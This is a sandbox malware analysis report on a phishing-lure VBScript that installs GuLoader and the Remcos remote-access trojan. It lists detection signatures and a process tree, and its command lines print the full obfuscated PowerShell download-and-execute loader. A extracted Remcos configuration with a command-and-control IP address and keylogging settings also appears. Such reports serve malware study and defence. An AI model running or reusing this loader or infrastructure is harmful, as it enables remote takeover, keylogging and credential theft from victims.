Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAYMENT - STATEMENT ADVISE.vbs

Overview

General Information

Sample name:PAYMENT - STATEMENT ADVISE.vbs
Analysis ID:1467964
MD5:8e3c190eff5e1e796f9cd8ac0eb18d0b
SHA1:751c299c930a6975b1f311c3d645554d0cfe8654
SHA256:a1b94e324beb19da2cabb254652df7c75dfcdad3c099012bb10e06448198d204
Tags:RATRemcosRATvbs
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7160 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloFS ellaciDigynialInbardgt Rd inge Sparekn Demate=Skibspr$ pr ekrJHolmganurecalibd Conti.a Fari.eeTelefonoAr metepMosekonhSkv.tsmo StakorbbreedsgiSygebe asitem d.Skr.nkesSteroedpc,tadiclHemaspei filetkt c ment(Arenigr$DeparteTFrabedeuSvikmllbdiglerheEchiteslTilmeldiRepris.kMyxinideAfdrags1dusinkj9Ops.nin3Salpaern EftermsAfb.egeuMikalaieAutomektShipfituOvertegd allyide Bombsi) dariot ');Venerator (Charcuteries 'Halatio[ Strim N.rkivkoe FemtentBriza,n.ModulerSCrownp eEmbusqurTrgrnsevBu,squii MandilcSexfilmeStraahaP CrepyboHiccupiiAnpartenOzonisetOxtersrMS,mvittaHomoeopnNo,ograaBookmakgHomogene.llenderSkriv,s]Fadsers:Vir som:Tor,edaS CombedeJocoquicWa.tsekuincons rUlasteliStatssktSaddeltyGru,vrkP Patri.rRussop oSo,ospitUslgelio gnosyncSuperbuoGlansrolDisp.ns Udpolst=E,eltof androge[elaboraNnige.suereassoctUnri dl.CultrifSLionelseLackerscMakroneuNonreclrC.anettispyflu.tIdi.sepy UnrecoPIrrecovrKvadratoGraastetForflyto Aff jecArchgeno NondemlBog.andTBlindgayShufflepinstitueGravrer]ripplet:Deempha:EkstatiTDestinelMegalo s Acetyl1Spiders2konvers ');$Judaeophobia=$Filten[0];$Forestaller= (Charcuteries 'Futonch$ utshigLitigatlProrescoSkindkrbbu leskaDat.erslRetsple:Esb,ergISpindplnPrislagtMuldva,eGrydersrShaga.aa bal,ngdFranchivVarmefyeMerrymanNat,onatKobberbuSubsetsaUdbr.delGainc,p=resurreNFlyvebieAn,aldtwBastard- E,vorpOfeltsenbGudsforj T.ojkae Undertc gat ert.mirtle RwanderS,ekonstyDngesansTotipott Pascale U dladmGeneral. Man riNRistorneResumedtSlamb,n. Car ioWMilieuteFeilspobConsignCFler,rulChremzliStrudsee Om,lagn.adiosot');$Forestaller+=$Praesternes[1];Venerator ($Forestaller);Venerator (Charcuteries 'Kri,esi$UnupbraISubs rinCanvasetSkovvogeDruidicrUltr,moa civilddHypochnv SkovsvePer,onknP.odukttKlavrinu,ebarraaProustil Embolo.SpartanHHonouraeAube.tbaBrev,krdNe riveePac retr.phelios ,raftv[Sowtvaa$EuropapS,tedsebw Invi.ciHusvalenAccentub FotogeuGalvanorFortry.nSaluth iDi phanaAr.iculn Sammen]Stemnin=Observa$AforedaRSchreibeTirmautsHerreliiMuhlypunApokry.a Grundf ');$uslebnes=Charcuteries ' Hoveds$st,digeIM dviljnFejdenstParacene FirmamrMiasmsiaSjlesrgd LededavubedrageFeeblehnSnrelidtL,jesveuKrybskya.rodderl Fljlsk.OctopedDDeliriso astervwKlapp,rnMorularlIng.edioLabyrinaIn,ercodBaroktsFTr nsmiiPrevisil.ellaree T unde(,rundve$ B.ggegJDogieovu .ortsedUfattelaMikkelaebl,sensoCost,trpEchoedph,matrryoSuperinbCarbureiFondsboa nichtu,Ny.nstt$TilpasnS.irksomo Neu.trePara elgHfligheeAceratetnosetioi D slgedJournal) Neglec ';$Soegetid=$Praesternes[0];Venerator (Charcuteries 'Lumtupe$DahliasgMegalodlKasse,poPlateasbanstukka LeucoslColdsl,:C,eirosO Porp yvDuggenseRorschar NivellpGust,iseLigestir WallopsBonderouUtilgngaSigillidNytt.nreB asens= Veksli( SknsmaTDragoo.eLangootsAutonomt.ejruds-BindselPSe.itroabrofogetKontrolh Prosob Requite$ ResearSMono,ypoAktiviteSta dargDigtnine Demuretnecrot.iso testd Overdr) Hecate ');while (!$Overpersuade) {Venerator (Charcuteries ' Surpli$Unsnugng LiderllVerdensoEry.hembGa,afacaU.efruglFordyre: P.nserA,rotektfPoodlesvLge,idei,agflikkImbecillTiltspaiI,dkaldnCheesingVidt,ersRinserst Fana,iidivisesd He.bace larebonHegled,sDialogf= quizzi$ ChienctB,mlespr SymptouImmunise delete ') ;Venerator $uslebnes;Venerator (Charcuteries 'MatchmaS MargartPrevaliaGennem,r QuetsctTjenstl- bruddeSForlys,l Dun,teeBrachyueQuadrimpDoethpr He,viso4Lederla ');Venerator (Charcuteries '.iperin$ karlekgWitherwl.plininoU ludnib Rumo sapyrrolel.elbeha:falmestOHyperbevAftoppeeBertramrKloakerpBa.kfireDrbtesorfondates IsolatuMistnkeaAjugasfd .isioneGove,nm=bullerp( onocotTRonrebreM.skulasLaanekatWegotis- RussopPFjendskaHoftenst Naigueh Eudoxi At ngle$UnenumeSchefpiloPi terneGasturbgTeate seDripolatrepetitiSrprge d filica) Indret ') ;Venerator (Charcuteries 'Flywhee$ManassegAleksanlInuitisoOp thalbD markaaGlos.oclNonimpe:Rekalk AStudsetfChefkokhDyophysa AcranieBlomst,no.stningRetorikiMarijnpg T,abenhTrivialeSh.pkeedAktivissk uldasfmicrophoRepressrRoskil.h ReturpoEurydicl tarifedBlo.ket=No,prot$Sti.karg ModstnlSonnetioSyng nebGodt.oeaTriperslKilahca: ransgrREnergimoopvartnwE.ighedtUdbindeh oprr s+Gossypi+Preind %Anony,i$ TornesFheartiliForsgsslOctahedt BrnekueSnobbernLandshe.NouskencDev.luao RenegauBarnesdn Sejrretpalpig ') ;$Judaeophobia=$Filten[$Afhaengighedsforhold];}$Substanced=338360;$Destructors=30531;Venerator (Charcuteries 'Ubetnks$Anti,lagBlle.osl ArabisoTekst,eb Innisiapreworll Tabelb:PolyneuS Rt blgkQueru.oy ucleolUdliggeiTobaksrn TnderhiunderhanMewerpogTreskib Sangaa,=Iagttag Kro.stGBugtaleeG,ehvidt Mosqui-MurinaeCslidseno Udklann GepeootTotaquieA faldsn Overlot abilit Lacus.$ rosaisS Antit oBemadameSaddelgg,enochoeJoi.twotAffekt i Parkerd egati ');Venerator (Charcuteries ' Charco$Chan.elgM rrainlAjourfooTidsstabjusbuttaArchi,elproport:SploshyMhomoiouiG,rranesUnderbusMartialiKompagns Salpet unuse u=Keyerpr infanta[AfhndelS Dextroy sludresMulctattSkoleekeS.aaligmhystade.JardineC MetodioMeta odnFranskmvIrratioe Sve.ker EutanatDameagt]Fysiurg: Vipper:Pre astF Skindhr fkldnojuncturmBenedicBPaasejlaUdlaanssIldebefeblaatop6Unprofu4ZaffersSFrijol,tSufflamrUnderaci EllevenTransmugSyskens(Entomop$kamarilS ,odillkBillig,yFrognoslAnhydcuienigmatnAffereniDodecasnBespottgAudiofo)R alist ');Venerator (Charcuteries 'Ekstern$UnsketjgR,ngleslFerrimaoFlakon b misshaa Somatol,eltman:NonvocaJDisincluVolubilvDepersoeForeholnTop.manoHeddaanlT skelpaVg.ontat ihramsrHitc.esyTaperyp Dyrtids=Ro.ator Coexte[ stroboSund.aafySprawlssParcenetAddend e Su.fermProg.am.Giraf oT CavidaeUngodlixUnpop,ltBisamme.dybdeboESeverinnunds,elcLkkerbiorapunsldNisus yiBjergtun Di,kvagCarious].unktio:Afbryd.: PromotA Fr,tehSSpidsbeCUnconstIRidderrIHousele.N.nadveG SpndeteUnprofot D.sarrSVasospat T gnesrUmo aliiMakluk nLig.gylgfortysk(Ma.kins$RekvisiMSpeakeriTvesindsdiffracsSkil.reiUdveje.sSkydkk.)Kundska ');Venerator (Charcuteries ' legiac$Ch.rkedgHumanisl boldheoaabenplb SupersaSupplerlLaenker:AlbanskCIrrisoraBramsejpeksamenrLaneykii AfsikrnDetox.diDataudvcGeneral=K.kotte$RetstavJFia.kosuParasitvFyr geseSefekhenfarsretoFiresidl Ida inaRevellitBickerernettoo yAcetoni.sapansysSlgersluRed,ktibB ygninsInboardtDelousermenneskiBegyndenImproprgNederde(Gravere$ VestenSPotophoufiftiesbBak.warsSkkestotAfsaaalakristofn Incorpcune.tere arethudIberegn,Paean z$.inchesDomform eFerments MythoctVectorirtin estuLi.uryacSc.naritTrass,roMineralrLeukonesDialogi)Foedee. ');Venerator $Caprinic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6456 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1084 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloFS ellaciDigynialInbardgt Rd inge Sparekn Demate=Skibspr$ pr ekrJHolmganurecalibd Conti.a Fari.eeTelefonoAr metepMosekonhSkv.tsmo StakorbbreedsgiSygebe asitem d.Skr.nkesSteroedpc,tadiclHemaspei filetkt c ment(Arenigr$DeparteTFrabedeuSvikmllbdiglerheEchiteslTilmeldiRepris.kMyxinideAfdrags1dusinkj9Ops.nin3Salpaern EftermsAfb.egeuMikalaieAutomektShipfituOvertegd allyide Bombsi) dariot ');Venerator (Charcuteries 'Halatio[ Strim N.rkivkoe FemtentBriza,n.ModulerSCrownp eEmbusqurTrgrnsevBu,squii MandilcSexfilmeStraahaP CrepyboHiccupiiAnpartenOzonisetOxtersrMS,mvittaHomoeopnNo,ograaBookmakgHomogene.llenderSkriv,s]Fadsers:Vir som:Tor,edaS CombedeJocoquicWa.tsekuincons rUlasteliStatssktSaddeltyGru,vrkP Patri.rRussop oSo,ospitUslgelio gnosyncSuperbuoGlansrolDisp.ns Udpolst=E,eltof androge[elaboraNnige.suereassoctUnri dl.CultrifSLionelseLackerscMakroneuNonreclrC.anettispyflu.tIdi.sepy UnrecoPIrrecovrKvadratoGraastetForflyto Aff jecArchgeno NondemlBog.andTBlindgayShufflepinstitueGravrer]ripplet:Deempha:EkstatiTDestinelMegalo s Acetyl1Spiders2konvers ');$Judaeophobia=$Filten[0];$Forestaller= (Charcuteries 'Futonch$ utshigLitigatlProrescoSkindkrbbu leskaDat.erslRetsple:Esb,ergISpindplnPrislagtMuldva,eGrydersrShaga.aa bal,ngdFranchivVarmefyeMerrymanNat,onatKobberbuSubsetsaUdbr.delGainc,p=resurreNFlyvebieAn,aldtwBastard- E,vorpOfeltsenbGudsforj T.ojkae Undertc gat ert.mirtle RwanderS,ekonstyDngesansTotipott Pascale U dladmGeneral. Man riNRistorneResumedtSlamb,n. Car ioWMilieuteFeilspobConsignCFler,rulChremzliStrudsee Om,lagn.adiosot');$Forestaller+=$Praesternes[1];Venerator ($Forestaller);Venerator (Charcuteries 'Kri,esi$UnupbraISubs rinCanvasetSkovvogeDruidicrUltr,moa civilddHypochnv SkovsvePer,onknP.odukttKlavrinu,ebarraaProustil Embolo.SpartanHHonouraeAube.tbaBrev,krdNe riveePac retr.phelios ,raftv[Sowtvaa$EuropapS,tedsebw Invi.ciHusvalenAccentub FotogeuGalvanorFortry.nSaluth iDi phanaAr.iculn Sammen]Stemnin=Observa$AforedaRSchreibeTirmautsHerreliiMuhlypunApokry.a Grundf ');$uslebnes=Charcuteries ' Hoveds$st,digeIM dviljnFejdenstParacene FirmamrMiasmsiaSjlesrgd LededavubedrageFeeblehnSnrelidtL,jesveuKrybskya.rodderl Fljlsk.OctopedDDeliriso astervwKlapp,rnMorularlIng.edioLabyrinaIn,ercodBaroktsFTr nsmiiPrevisil.ellaree T unde(,rundve$ B.ggegJDogieovu .ortsedUfattelaMikkelaebl,sensoCost,trpEchoedph,matrryoSuperinbCarbureiFondsboa nichtu,Ny.nstt$TilpasnS.irksomo Neu.trePara elgHfligheeAceratetnosetioi D slgedJournal) Neglec ';$Soegetid=$Praesternes[0];Venerator (Charcuteries 'Lumtupe$DahliasgMegalodlKasse,poPlateasbanstukka LeucoslColdsl,:C,eirosO Porp yvDuggenseRorschar NivellpGust,iseLigestir WallopsBonderouUtilgngaSigillidNytt.nreB asens= Veksli( SknsmaTDragoo.eLangootsAutonomt.ejruds-BindselPSe.itroabrofogetKontrolh Prosob Requite$ ResearSMono,ypoAktiviteSta dargDigtnine Demuretnecrot.iso testd Overdr) Hecate ');while (!$Overpersuade) {Venerator (Charcuteries ' Surpli$Unsnugng LiderllVerdensoEry.hembGa,afacaU.efruglFordyre: P.nserA,rotektfPoodlesvLge,idei,agflikkImbecillTiltspaiI,dkaldnCheesingVidt,ersRinserst Fana,iidivisesd He.bace larebonHegled,sDialogf= quizzi$ ChienctB,mlespr SymptouImmunise delete ') ;Venerator $uslebnes;Venerator (Charcuteries 'MatchmaS MargartPrevaliaGennem,r QuetsctTjenstl- bruddeSForlys,l Dun,teeBrachyueQuadrimpDoethpr He,viso4Lederla ');Venerator (Charcuteries '.iperin$ karlekgWitherwl.plininoU ludnib Rumo sapyrrolel.elbeha:falmestOHyperbevAftoppeeBertramrKloakerpBa.kfireDrbtesorfondates IsolatuMistnkeaAjugasfd .isioneGove,nm=bullerp( onocotTRonrebreM.skulasLaanekatWegotis- RussopPFjendskaHoftenst Naigueh Eudoxi At ngle$UnenumeSchefpiloPi terneGasturbgTeate seDripolatrepetitiSrprge d filica) Indret ') ;Venerator (Charcuteries 'Flywhee$ManassegAleksanlInuitisoOp thalbD markaaGlos.oclNonimpe:Rekalk AStudsetfChefkokhDyophysa AcranieBlomst,no.stningRetorikiMarijnpg T,abenhTrivialeSh.pkeedAktivissk uldasfmicrophoRepressrRoskil.h ReturpoEurydicl tarifedBlo.ket=No,prot$Sti.karg ModstnlSonnetioSyng nebGodt.oeaTriperslKilahca: ransgrREnergimoopvartnwE.ighedtUdbindeh oprr s+Gossypi+Preind %Anony,i$ TornesFheartiliForsgsslOctahedt BrnekueSnobbernLandshe.NouskencDev.luao RenegauBarnesdn Sejrretpalpig ') ;$Judaeophobia=$Filten[$Afhaengighedsforhold];}$Substanced=338360;$Destructors=30531;Venerator (Charcuteries 'Ubetnks$Anti,lagBlle.osl ArabisoTekst,eb Innisiapreworll Tabelb:PolyneuS Rt blgkQueru.oy ucleolUdliggeiTobaksrn TnderhiunderhanMewerpogTreskib Sangaa,=Iagttag Kro.stGBugtaleeG,ehvidt Mosqui-MurinaeCslidseno Udklann GepeootTotaquieA faldsn Overlot abilit Lacus.$ rosaisS Antit oBemadameSaddelgg,enochoeJoi.twotAffekt i Parkerd egati ');Venerator (Charcuteries ' Charco$Chan.elgM rrainlAjourfooTidsstabjusbuttaArchi,elproport:SploshyMhomoiouiG,rranesUnderbusMartialiKompagns Salpet unuse u=Keyerpr infanta[AfhndelS Dextroy sludresMulctattSkoleekeS.aaligmhystade.JardineC MetodioMeta odnFranskmvIrratioe Sve.ker EutanatDameagt]Fysiurg: Vipper:Pre astF Skindhr fkldnojuncturmBenedicBPaasejlaUdlaanssIldebefeblaatop6Unprofu4ZaffersSFrijol,tSufflamrUnderaci EllevenTransmugSyskens(Entomop$kamarilS ,odillkBillig,yFrognoslAnhydcuienigmatnAffereniDodecasnBespottgAudiofo)R alist ');Venerator (Charcuteries 'Ekstern$UnsketjgR,ngleslFerrimaoFlakon b misshaa Somatol,eltman:NonvocaJDisincluVolubilvDepersoeForeholnTop.manoHeddaanlT skelpaVg.ontat ihramsrHitc.esyTaperyp Dyrtids=Ro.ator Coexte[ stroboSund.aafySprawlssParcenetAddend e Su.fermProg.am.Giraf oT CavidaeUngodlixUnpop,ltBisamme.dybdeboESeverinnunds,elcLkkerbiorapunsldNisus yiBjergtun Di,kvagCarious].unktio:Afbryd.: PromotA Fr,tehSSpidsbeCUnconstIRidderrIHousele.N.nadveG SpndeteUnprofot D.sarrSVasospat T gnesrUmo aliiMakluk nLig.gylgfortysk(Ma.kins$RekvisiMSpeakeriTvesindsdiffracsSkil.reiUdveje.sSkydkk.)Kundska ');Venerator (Charcuteries ' legiac$Ch.rkedgHumanisl boldheoaabenplb SupersaSupplerlLaenker:AlbanskCIrrisoraBramsejpeksamenrLaneykii AfsikrnDetox.diDataudvcGeneral=K.kotte$RetstavJFia.kosuParasitvFyr geseSefekhenfarsretoFiresidl Ida inaRevellitBickerernettoo yAcetoni.sapansysSlgersluRed,ktibB ygninsInboardtDelousermenneskiBegyndenImproprgNederde(Gravere$ VestenSPotophoufiftiesbBak.warsSkkestotAfsaaalakristofn Incorpcune.tere arethudIberegn,Paean z$.inchesDomform eFerments MythoctVectorirtin estuLi.uryacSc.naritTrass,roMineralrLeukonesDialogi)Foedee. ');Venerator $Caprinic;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3180 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5652 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 3228 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 6396 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 3748 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5608 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
